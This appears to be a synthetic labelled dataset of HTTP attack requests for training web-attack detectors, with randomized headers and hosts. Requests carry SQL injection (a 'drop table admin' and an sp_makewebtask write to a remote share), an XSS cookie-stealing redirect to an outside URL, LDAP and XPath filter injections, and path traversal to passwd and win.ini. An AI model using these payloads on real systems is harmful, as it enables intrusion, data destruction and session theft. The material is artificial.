UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/2.1 www.ndeot.png, 6.2 www.momfs2ti.shtml, FTP/4.7 218.225.175.124
Transfer-Encoding: Evle
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 764 www.estd.html "reyeebllnhmEobh" 
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35585
Start - Id: 39038
class: LdapInjection
PUT /tlnLocD4qXYLQ/t-01Z/sZ2nxzAJ@iNGwV/nellOatb/eoj9WHYwhaJ/EZQ@usr4U2@rCxmus.htm? HTTP/1.1
Content-Length: 53
Content-Language: aapnahy,a
Content-Encoding: deflate
Content-Location: http://aeecsNyS.com/rLptR.jsp
Content-MD5: bnQxbWpoVGlpbnJlbmhndA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Aug 06 22:37:17 CET
Last-Modified: Fri, 23 Apr 04 23:04:19 CET
Host: www.mwrvoo.st
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, windows-1250, utf-7, euc-cn;q=0.5
Accept-Encoding: *
Accept-Language: iottBel-ipeiess;q=0.7
Cache-Control: no-transform
Client-ip: 71.29.14.198
Cookie: mesvoi=%ep;stnotanaatwns=riianbose1z;zet=23718460;smeaidrE=4>p
Cookie2: $Version="741"
Date: Sat, 17 Apr 04 04:03:49 GMT
ETag: "l2SfdSdZ9GmvmV1."
Expect: 100-continue
From: n1eboh@st19rPen.org
If-Modified-Since: Tue, 13 Apr 04 04:18:30 UTC
If-Unmodified-Since: Thu, 24 Jun 04 15:22:28 CET
If-Match: *
If-None-Match: "qFhzB8KbQ2RIO-4_@"
If-Range: "kU4r2uvvqAg1ORe"
Max-Forwards: 2
Pragma: otdd=t
Authorization: NTLM ZW9hNDRJYXRiYWloZWllZG5hZWVzYXh1aGxoYm9zcm5uZW96cnJ0aA==
Referer: /lefi0nl.php3
TE: gzip;q=0.9,chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: mlI)(|  (4a=*)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Color: color8
UA-Pixels: 247x1587
Via: sel/2.0 www.ngho5aT.gif
Transfer-Encoding: gzip
X-Forwarded-For: 157.105.101.82
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

1lsiallr-jLEQ=38142613&ai7hio=688987&Anpoa=0G8eex1hVO

End - Id: 39038
Start - Id: 37402
class: LdapInjection
GET /bteid/ssoNBtadminKYWJB/nbptefye/owECNHA7OSWwq/8F-GFiUUformVPD/6f.Sx.5K2RlXlKgt/i7UZSW7Ki4qn6@7aH/eetdnlqsSjwietpS/tietFA/bwoKnrd3dngi/b4ZvS4.WTe_lYM7ueTq.bin?iegy=sm%2B+&dannaa=0&CPwu=TrqnaDc&2iEqo=5r1n&ZdL.ZlgxXP=ohU&ae=EgeE&5q=bsl%3A&t@GSomWm66=9906&yipnosG=i%3Etupdatebchooix%28%7C%5C&ydheitund=50685&l5banie=sheE&xPp1=0506 HTTP/1.0
Host: 84.90.10.220
Connection: close
Accept: audio/basic;q=0.6, video/mpeg
Accept-Charset: iso-8859-9;q=0.3, windows-1251, x-mac-greek;q=0.0
Accept-Encoding: 
Accept-Language: aoEO7im-b, lkIa8nwe-cetSeni, no5S-pe8d8Ey;q=0.6, 7nytta-liahh;q=0.7, onak-lgame
Cache-Control: max-stale
Client-ip: 97.191.125.72
Cookie: e3ud0esiw4anot=8et)(&(objectClass   =   9oT*);1cpet=5
Cookie2: $Version="96"
Date: Sun, 13 Mar 05 08:00:53 CET
ETag: W/"I4bxWhF3dD.58ZB"
Expect: 100-continue
From: a9rhuT@wsiL.cz
If-Modified-Since: Sun, 07 Dec 08 12:24:36 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:50:00 GMT
If-Match: "bwuM.qB0na2FUsKQF46"
If-None-Match: "855wpXm@.hX0e7tl"
If-Range: "jUYSnmu4@NakslGW"
Max-Forwards: 352
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aHNkZjpyc29lZQ==
Authorization: NTLM aGFyck9lRGxCN01lZnVJdG5yQW91YW9lYXRuaFhyd2NwZW5h
Range: 92271-,85-
Referer: http://lophh.gov/oedeD/SCdio.aspx
TE: trailers,trailers,chunked;q=0.2
Trailer: Max-Forwards
User-Agent: tbeYg3crng (tihVL4bxb; 5obsosuSE; rf7oTmeIY)
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 233x3973
Via: 1.4 35.151.29.63, HTTP/0.5 www.aaTaOee.jpg
Transfer-Encoding: deflate
Upgrade: ontd/7.5, eEr1lt/2.5
X-Serial-Number: 42967168718609635
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37402
Start - Id: 35653
class: XPathInjection
GET /exae/chTzQB.aspx?hdstlfdao492=Ek20eel%3Ee&1oaa0rezLahHv4h=eilesvae%27++++or+++1%3C+++om%2Ft%2Fa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D416%5D+++or++++%27sl%27++%3D+%27 HTTP/1.1
Host: 180.233.224.8
Connection: close
Accept: audio/basic;q=0.7
Accept-Charset: hz-gb-2312;q=0.9, windows-1251;q=0.4, x-mac-hebrew, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 85.216.49.129
Cookie: hV1inri=:ur;4enmNei=oohFdt;H1XlibU8Pg=3347
Cookie2: $Version="33"
Date: Thu, 24 Dec 09 11:09:41 GMT
ETag: W/"0kJdeNT3pvGXpWIhjQi"
Expect: ye2S
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Tue, 04 Apr 06 10:00:44 UTC
If-Unmodified-Since: Sun, 17 Sep 06 21:13:07 CET
If-Match: "Qup6a@Nbh@1lVHq0"
If-None-Match: "ELB9rkq_.Cv9cLxCfC1"
If-Range: Sun, 11 Feb 07 02:39:26 CET
Max-Forwards: 6
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZGFueG1ocnRnZnRvNGFjRXVkc3JoZW5Oc0xlZWwzYWtuZVl3
Authorization: NTLM YzZrYmVzeXJjaU5uZXljczFGcHJjN2Vlcm80anJhaGlmdGU3d2dzaQ==
Range: -38,162-85,-031
Referer: /snsa/oitewe/lroRo.mp3
TE: trailers,deflate
Trailer: User-Agent
User-Agent: Mozilla/8.4 (compatible; Konqueror/3.3; Linux i586; lnfotpleef)
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: FTP/5.6 177.200.131.82:261, 3.3 www.snttn.jpg, HTTP/4.9 248.15.226.204
Transfer-Encoding: ropcH; iTam3eua=koe0ro
Upgrade: deki/7.7
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35653
Start - Id: 46680
class: XSS
GET /aesMl/enX@r77nLN3Lef_KDr4/eaenteDstoirusnwhpfi/8ZIDw1/rx/36G8z8S-xM/dr2ar6zhes/smewbtTiti.php3? HTTP/1.1
Host: 4.207.247.68
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pewrnt-no, meB-he;q=0.9, tecaeee2-plgt4rr8;q=0.8
Cache-Control: max-stale
Client-ip: 113.189.52.52
Cookie: crluttIneril=<div    style    =   "  width:     expression([document.location.replace    ('http://www.metrin.com/cgi-bin/nsicve.cgi'+document.cookie);]);    "    >
Cookie2: $Version="94"
Date: Wed, 15 Mar 06 22:34:24 UTC
ETag: "LbLGWBdKI72rB3GO@"
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Mon, 25 May 09 15:24:36 UTC
If-Unmodified-Since: Sun, 20 Apr 08 17:05:50 GMT
If-Match: "zGsUOWWOtrO9udU"
If-None-Match: *
If-Range: "NlMTaOPuCi18rE5lem"
Max-Forwards: 3587
MIME-Version: 1.9
Pragma: Estilgu=fwteosc
Proxy-Authorization: 5taRoo rnn5=c3tA9
Authorization: Digest nc=23eD8fc3
Range: 2194-5461,312-2895
Referer: /elee/nrrhpg.bin
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: 0igxsnbA (d_YHdAU; znpF54sHb; hteOlTPWqt)
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: compress
Upgrade: reeaDa/8.7, ddJ/0.9, ft5C/5.8, 5lwo/3.8
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46680
Start - Id: 35166
class: SqlInjection
GET /dAcoRzAMvUHs4RxwM/dgeoy4vm/M92/IpU0CetEE.uqD/iy/HUperl0G-/sxmg6/wya1DeBLqn.j.gif?N4c21UpGIa=ocw&b58ehsse=antcpn&s1nTtoeoohUsv=%27++++union++++select++++sum%28n3s3a7%29++from+++++laR--&ithsihx=m7HR%40&VUmaOq9=88658859&4lielnh39g9ed=nnHza%5DtB&e0aenni=95264&uipoDgbhm6lNnu=s.v%40nUY&3nitYexec3uC0N=gY5s&rBrsnhowi=8099 HTTP/1.0
Host: 161.72.35.32:80
Connection: keep-alive
Accept: application/x-tar, text/plain, image/png;q=0.5
Accept-Charset: x-mac-ce;q=0.5, x-mac-turkish;q=0.9, x-mac-japanese;q=0.4
Accept-Encoding: *;q=0.2
Cache-Control: max-stale
Client-ip: 235.157.63.95
Cookie2: $Version="98"
Date: Sat, 03 Nov 07 18:29:14 UTC
ETag: "yVk20OLqWyt55fRiFtBZ"
If-Modified-Since: Sun, 11 Apr 04 18:41:59 CET
If-None-Match: *
Proxy-Authorization: Digest realm
Range: 97412-
Referer: /cnFdit.gz
User-Agent: 7eliltle (e3DVcp)
Via: 7.8 144.58.131.193, HTTP/9.1 www.eaort.htm, FTP/5.1 www.oehn.htm
Transfer-Encoding: deflate

null

End - Id: 35166
Start - Id: 41121
class: SqlInjection
GET /aoOeo63wduse5ldeI6/glyExKuNh263Uqgr/gxp_jU1Vhsr_uOhF/nrnahaeNhrzesadr/ewXrMmaBzOOVYvpKISF/oOuLMjR10/nszisACbYT/iyraennav.htm?ltAsantieoxeE=bulk+++++insert++++aoa8en++from++%27pwdump.exe%27++++++with++++%28codepage%3D%27RAW%27+++%29&awbndHBhO=60769&0skayxo=ozw HTTP/1.0
Host: 27.86.187.83
Connection: styp7ea
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=0995
Date: Fri, 09 Mar 07 01:33:46 GMT
If-Unmodified-Since: Thu, 10 Jun 04 20:18:33 CET
If-Match: *
Max-Forwards: 417
Pragma: oz2s='ltryu'
Referer: /iaese.sh
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 0.6; ri-uo; rv:0.4.1) Gecko/57909281
UA-Disp: 031,698,16

null

End - Id: 41121
Start - Id: 41044
class: SqlInjection
GET /hCQ.tEOYcmPPtt9/v1tmpetc6boot.inichild.dll?tem=rs&nnitEqrSgyay=nshiesj6oigue&assE=tNkBO0bcj&ntsshmfemwaaawi=37397&tU@t1r=0467900&yaeltAahy2gd=ofimgha%2BO9&pt6XWYR8rmCy=eMS%40GDaJK&ejzdih=8429&qd=%27%3B+EXEC++master..sp_makewebtask+%22%5C%5C160.84.189.53%5Cmtn3bao%5Csuhw19r.css%22%2C+++++%22SELECT++*+++++FROM+INFORMATION_SCHEMA.TABLES%22&3lzhmrndmzoiDnw=eEw9ni2&bn1er8oryua07b=Mmtmpagee%7Eseiframeuosam9c5c&eu33sojief=%40An+ey%3Bsbw HTTP/1.1
Host: www.upeRvu.net:80
Connection: idryhauc
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: 2shulsEs-Ttthh;q=0.1
Cache-Control: no-transform
Client-ip: 228.241.241.37
Cookie: he1aptw0Peomgit=4csoytmp+u)t@
Cookie2: $Version="90"
Date: Wed, 05 Apr 06 05:42:58 GMT
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: issottp
From: i4axWsi@dEthgse.cz
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Mon, 09 Feb 09 24:19:41 CET
If-Match: "8wX7mC.vklwA5ck59"
If-None-Match: "MIM1Rkne.Zn7WM3SoY"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 5178
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic OGZidGM1cXo6bFRzcUE0dA==
Range: 7-04,570-
Referer: /ejgere/haea/nhge.ace
TE: gzip;q=0.2,trailers,deflate;q=0.0
User-Agent: y8ue9juci5 http://www.atsNsKo.biz
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 381x817
Via: HTTP/2.5 www.ibheu0.htm, HTTP/1.9 140.49.10.245, HTTP/5.0 www.86h8voir.jpeg:0343
Transfer-Encoding: deflate
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 050 www.r6ioleOa.htm "witutEd" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41044
Start - Id: 36269
class: PathTransversal
POST /oesqk_SEjGB@8TgbHW/oYNRgCBm@L_61p/heemohTet.bin? HTTP/1.1
Content-Length: 150
Content-Language: f,nnte
Content-Encoding: identity
Content-Location: http://www.r4eorm.com/enctea/lPiianG/6eta9/lJnSw/zMer.shtml
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Jan 07 10:31:40 CET
Last-Modified: Fri, 18 Sep 09 24:07:14 UTC
Host: 178.99.79.75:80
Connection: modlts
Accept: video/quicktime, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Date: Mon, 30 May 05 04:02:06 UTC
From: adlol0a@asEAst.gov
MIME-Version: 0.6
Pragma: no-cache
Authorization: oqtqI bmecg=wPclr
Referer: http://om3udb.ch/ei993Im/6sLt.css
User-Agent: m-U0ZI.-lr http://www.eeatttqg.cz

ieXf4R@=3339409&eeejscaoTlYam=/,,,/iicmgO/ra/passwd&nrie8eia5l=o%  noq locationhr/ot(CaS4t&ODFgWlikeMEos=6775&ehdmtjsp70ns=r?ecy

End - Id: 36269
Start - Id: 49851
class: XPathInjection
GET /dyQR/ui5tsut9e/ngxa5SYfLu0I3n5mk/uasU/ushywncod/denvhtpurbuR/uIAd5SrItooeeigotusb/zaedolTit.bin?adPjyardtin=98255&mwiolnnwi6ranQ=tk5r1rTll&aein=eahs3wS%27++or+%28i+++++%3C++count%28nrtd%2Fchild%3A%3Atext%28%29%29+++++and+++j+++%3C+count%28el%2Fchild%3A%3Acomment%28%29%29+++++and++k++++%3C++++count%28fto%2Fchild%3A%3A*%29++++%29+++++or+%27tgoyte%27%3D++++%27++++or5rotbe%27+++or HTTP/1.0
Host: 146.189.240.156:124
Connection: yyl2zt
Accept: audio/basic, image/*, image/jpeg;q=0.1
Accept-Charset: x-mac-korean;q=0.4, cp-932, windows-1252;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=00
Client-ip: 236.200.66.115
Cookie: sWHvnvwzllu5siy=e;z1xgrdallQcopyW=95;O0iselect11dX6W=2mauTiuxQE;clJF-=j3B@ s~wp-etci0qen4gh
Cookie2: $Version="7"
Date: Mon, 31 Jul 06 17:29:32 UTC
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: 100-continue
From: ohlydam@WdehaAi.biz
If-Modified-Since: Wed, 10 Dec 08 24:13:51 GMT
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "Rd8lnWTUmjeqffHUmwS"
If-Range: Fri, 26 Oct 07 20:04:00 GMT
Max-Forwards: 729
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest opaque="dscetms"
Range: 98475-041,374-
Referer: http://www.nfLetno6.com/1oidadb/7391t7ih/5gvinr.sh
TE: gzip
Trailer: If-Modified-Since
User-Agent: IoaEwdtn (lpCpV.p; e9mat8EDSW; d.hqnPP7C3)
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: FTP/0.7 140.133.133.58
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49851
Start - Id: 45906
class: PathTransversal
GET /rinclude/berl.jpeg?ueM=mXgsd21&plfoxahio=1heoan%3BC&mOOL8tm8co=%3BuqaifsatHeI&tIlgsna=7qv9sj&balbyerf5=ceoBdydiTi2Ft&rnr=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&joExjkr=Cr%25elf%2Fnbei%25Rdwinntu HTTP/1.1
Host: www.msneo.fr
Connection: norntfo
Accept: application/rtf, application/x-tar;q=0.2
Accept-Charset: x-mac-hebrew;q=0.7, koi8-r
Accept-Encoding: 
Accept-Language: jR1tnmp5-8n7o, TfnREtli-krirdia7, w5tT-e;q=0.9
Cache-Control: no-store
Client-ip: 132.53.138.134
Cookie: 1al2Rbqyr=yEub;ooLal8shtph=931;Dwyatplyeu7netM=eacopy7ce0;4m62phttpiJpVBq=40880;slneetOte7ayoa8=yuJcKFK;aFtatenhlS=xzte
Cookie2: $Version="43"
Date: Tue, 01 May 07 20:08:36 GMT
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Tue, 24 Aug 04 11:33:43 GMT
If-Unmodified-Since: Wed, 06 Apr 05 14:50:07 GMT
If-Match: *
If-None-Match: "EFZSVR096uCoBXqXt"
If-Range: "a2qF-nVeSjK-zTm"
Max-Forwards: 7063
MIME-Version: 1.5
Pragma: of=a
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic N2loYWVudDo2aW5q
Range: 2-4458,00-
Referer: /lsmmraN/eeou4hsz.msf
TE: trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 9.2; en-8V; rv:8.8.8) Gecko/12587832
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/1.2 www.sasinhH.gif, 4.9 18.220.230.13, HTTP/6.0 43.247.58.168
Transfer-Encoding: gzip
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 7456585947858
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45906
Start - Id: 47679
class: XSS
GET /aeoltrds2lhTlser/ea6RleeamYs8wT/e2/ndakkntaduao/5BUidysj/rNSMO/ZmG1y-rL8U8.html?criryeaim=i1sB&tca8sAn7Iw9et=bu%5Dmggisouh&nztonetc6a=7990560&DWJWz=1&ps4wMTgZ=access_logeihou%7EiwheresdN&sr=amnc1esseeweOssu&2otioieeMtEfs=%3Cdiv+++style%3D%22++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.sita.com%2Fscript%2Fnwe.cfm%5D%29%3B+++++%22+%3E&oeana0s=891756251&es9=17&SscOIoOftsv8i=updatei%5D&oiSm3hiNhrs=66776288 HTTP/1.0
Host: 128.175.33.170
Connection: close
Accept: application/*;q=0.8, application/*;q=0.7, text/plain;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 169.221.111.228
Cookie: eEqznrh6Ei=;b;npmstauino=At:;
Cookie2: $Version="699"
Date: Mon, 27 Sep 04 14:27:48 UTC
ETag: W/"B5.amP4RFDQ0Wn0"
Expect: 100-continue
From: 25osyn@hmnsy.org
If-Modified-Since: Sun, 16 Apr 06 24:27:24 CET
If-Unmodified-Since: Wed, 16 Feb 05 08:40:46 CET
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: *
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 627
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic Y3p5cmU6MzNkaQ==
Authorization: nemanc ahnau=ondhpsao
Range: 88-3327,5192-94,8597-
Referer: /dtjateos/rekoj.jsp
TE: trailers
Trailer: From
User-Agent: AJotoeisrag
UA-CPU: 68000
UA-Disp: 8471,6615,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: 9.8 www.eed6m.tiff
Transfer-Encoding: identity
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47679
Start - Id: 37105
class: LdapInjection
GET /o2@G6QtA.S/otlaiit/5ero1fe0/cse/-NWtt19-cP/xx/nec08Gm4yLIVFJe/qWn-ku3LlM/sDrntjhdteoI/oYLF_Qn3s_/s9syletzbhe.php4?0SjZwscriptVXeqpW=3768%29%28%26%28objectClass%3DINin%29%28%7C%28sn++++%3D++reN%29%28cn%3DcnoQ+++J*%29%29&6t5rle46=trry HTTP/1.0
Host: www.lreizmreIp.de
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.1, identity;q=0.0
Accept-Language: *;q=0.4
Cache-Control: max-age=41
Client-ip: 118.166.126.189
Cookie: ocuk1ajeotkAnl=dNi;InneRlGUnSB=nmaild0armcpositionveHk7aaccess_logsc;pkWHOu1-y=l]ncinsert
Cookie2: $Version="020"
Date: Sun, 27 Dec 09 10:08:36 UTC
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: neihsLts
From: nslcao@cr2ir.it
If-Modified-Since: Tue, 29 Sep 09 16:12:50 GMT
If-Unmodified-Since: Mon, 24 Jul 06 15:27:06 UTC
If-Match: "@0sTaB9Jcv1mpZiO"
If-None-Match: "8BM@y_AICcHs5q@xQG2"
If-Range: Mon, 01 Sep 08 06:22:32 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: cerrEia=Spss
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Basic cmVzZXJxOnJFZXRubg==
Range: 447995-1,-181875,4-55620
Referer: http://www.t39i.com/maria7.pl
TE: chunked,gzip;q=0.2
Trailer: Via
User-Agent: iguvyv http://www.oeea.be
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: HTTP/3.9 186.137.60.44
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 330 www.aiew2aRa.jpg "huTweibwmAEeQpte" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37105
Start - Id: 36221
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.I3dmkmlnty.de
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=125
Client-ip: 253.92.235.246
Cookie: A0ruzsuariit=csm2Ce5Ruyihlsdh;wouervt=rhwflIqdyehH;JqFTsE6=g/f+;1a=e6eir
Cookie2: $Version="6"
Date: Thu, 14 Jun 07 24:55:36 CET
ETag: W/"3f1XJysaM8JKnKP718"
Expect: b5ooxi=dd0uA
From: tictooes@rEbaola.net
If-Modified-Since: Mon, 21 Feb 05 05:42:28 CET
If-Unmodified-Since: Wed, 03 Dec 08 10:02:56 GMT
If-Match: *
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: Fri, 01 Jul 05 03:25:10 CET
Max-Forwards: 0
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM YWVjZTlzYU45cmVub3RwVGVldGJpZ3RvdGw0ZXRsZkVja21zYnRuamk=
Range: 183-
Referer: http://unEjeoWe.fr/ssqatdto/qnde0gg/h56t/ylE0c7Nl.php
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/6.8 (X11; U; Open BSD i386 6.5; 0w-az; rv:8.0.4) Gecko/14124801
UA-CPU: StrongARM
UA-Disp: 399,5892,8
UA-OS: Win98
Via: HTTP/5.2 www.eri0ib8.css:8671, HTTP/5.1 www.aneebj.shtml, HTTP/7.0 www.Abtrtn.html
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36221
Start - Id: 35386
class: SqlInjection
GET /r281MKi2iL.3KCptvAPh/Y2JFEpscriptTbdocumentwxterm/@BjR5gandTipDd07/nx7tAgi5y/tkWIfw/xf5N2L/aitikqyL/6C2C/nxtX.QfjFLtd_@6/kj2fanotc/atuteoAiep.aspx?ze4batdoug=%27%3B+++drop++++table+++++admin&omr3ctouhf=3&bldaawrh=ki6-&f5h0adoqiTt=bour&DtRg7x8oij=0%3C+rkNnAei+se06cmde&0a@I2=9800651&8X-Kpasswdbetween1TOzTfrom=rrnLbin%5Dueitq+&la=2299&6yom=+&g0ne=qp&6h1TlocationIlogRzP3p=otbodyo HTTP/1.0
Host: 88.208.237.185:1899
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.3, compress, compress
Accept-Language: hrrYen-leac;q=0.6, r4iEacn-22ztred, k3sgk-rD;q=0.0, isaioo-udS, 2nrhun-s;q=0.5
Cache-Control: no-transform
Client-ip: 136.187.28.79
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="548"
Date: Mon, 21 Feb 05 24:01:46 UTC
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: aean4o8=I7mo
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Mon, 05 May 08 10:54:09 CET
If-Unmodified-Since: Tue, 19 May 09 12:09:00 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Mar 09 21:27:59 CET
Max-Forwards: 4
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: Digest username="aeXotfC"
Range: 55-,0-,6611-
Referer: /raaytnnt/eaurlt.sh
TE: trailers
Trailer: Transfer-Encoding
User-Agent: nlBdn (2sWimG.1A; qf-38Nl; oSkakLf5a6; wUAtbLJK; wkrpjxs__X)
UA-CPU: Sparc
UA-OS: Windows 95
UA-Pixels: 177x860
Via: 7.5 24.251.102.100, lgps/2.5 240.117.135.68
Transfer-Encoding: Erdsx
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35386
Start - Id: 38396
class: LdapInjection
GET /radixfnagnso/cooiauf01iusshh.js?non7or=sxrMe2Ae8%3B%5Dt%26nme%2B&aho=70%29%28%26%28objectClass%3Ddmbr%29%28%7C%28sn+++%3D++su7u%29%28cn%3Drs4+J*%29%29 HTTP/1.0
Host: www.i2erh.st
Connection: icru
Accept: text/*;q=0.6
Accept-Charset: iso-8859-4;q=0.9, iso-8859-1;q=0.5, iso-8859-15;q=0.8, utf-8
Accept-Encoding: *
Accept-Language: itomoj6-ntss;q=0.1
Cache-Control: only-if-cached
Client-ip: 214.154.43.120
Cookie: aetsgn=tGDnr38r@pk;q.3NX=$between;ee7eeanirrdu3wa=20600784
Cookie2: $Version="08"
Date: Thu, 20 Dec 07 12:20:13 CET
ETag: W/"QfRpXLxEGDTgWWni"
Expect: 100-continue
From: bahiT@etI8o.net
If-Modified-Since: Wed, 19 Apr 06 23:11:45 GMT
If-Unmodified-Since: Sun, 07 Dec 08 12:51:03 CET
If-Match: *
If-None-Match: "aArLISgjwm7L9c4IRDy"
If-Range: "IJ15T3I2H60zmAJYV"
Max-Forwards: 022
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: Basic TUVvdDpubmth
Range: -96373
Referer: http://www.eghs.cz/3te1nri6/cmyntgb/ueileoo/ynaJgdr.asp
TE: deflate
